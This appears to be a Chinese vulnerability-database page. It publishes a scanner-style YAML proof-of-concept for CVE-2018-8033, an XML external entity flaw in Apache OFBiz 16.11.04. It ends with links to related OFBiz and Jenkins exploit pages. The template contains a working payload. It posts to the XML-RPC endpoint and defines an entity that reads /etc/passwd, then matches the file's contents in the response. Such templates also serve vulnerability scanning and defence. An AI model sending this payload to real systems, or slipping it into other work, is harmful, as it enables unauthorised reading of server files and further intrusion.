CVE-2018-8033: Apache OFBiz XXE

漏洞描述

PoC代码[已公开]

id: CVE-2018-8033

info:
  name: Apache OFBiz XXE
  author: pikpikcu
  severity: high
  description: XXE injection (file disclosure) exploit for Apache OFBiz 16.11.04
  reference:
    - https://lists.apache.org/thread.html/e8fb551e86e901932081f81ee9985bb72052b4d412f23d89b1282777@%3Cuser.ofbiz.apache.org%3E
    - https://nvd.nist.gov/vuln/detail/CVE-2018-8033

rules:
    r0:
        request:
            method: POST
            path: /webtools/control/xmlrpc
            headers:
                Content-Type: application/xml
            body: <?xml version="1.0"?><!DOCTYPE x [<!ENTITY disclose SYSTEM "file://///etc/passwd">]><methodCall><methodName>&disclose;</methodName></methodCall>
        expression: response.status == 200 && "root:.*?:[0-9]*:[0-9]*:".bmatches(response.body)
expression: r0()

相关漏洞推荐

• CVE-2020-9496: Apache OFBiz XML-RPC Java Deserialization POC

  2025-09-01 | Apache OFBiz
  XML-RPC request are vulnerable to unsafe deserialization and Cross-Site Scripting issues in Apache O...

• CVE-2021-29200: Apache OFBiz < 17.12.07 - Arbitrary Code Execution POC

  2025-09-01 | Apache OFBiz
  Apache OFBiz has unsafe deserialization prior to 17.12.07 version An unauthenticated user can perfor...

• CVE-2023-49070: Apache OFBiz < 18.12.10 - Arbitrary Code Execution POC

  2025-09-01 | Apache OFBiz
  Apache OFBiz是美国阿帕奇（Apache）基金会的一套企业资源计划（ERP）系统，提供了一整套基于Java的Web应用程序组件和工具。 Apache OFBiz 在 18.12.10 版本之...

• CVE-2018-1000600: Pre-auth Fully-responded SSRF POC

  2025-09-01 | Pre-auth
  A exposure of sensitive information vulnerability exists in Jenkins GitHub Plugin 1.29.1 and earlier...

• CVE-2018-1000861: Jenkins 2.138 Remote Command Execution POC

  2025-09-01 | Jenkins
  A code execution vulnerability exists in the Stapler web framework used by Jenkins 2.153 and earlier...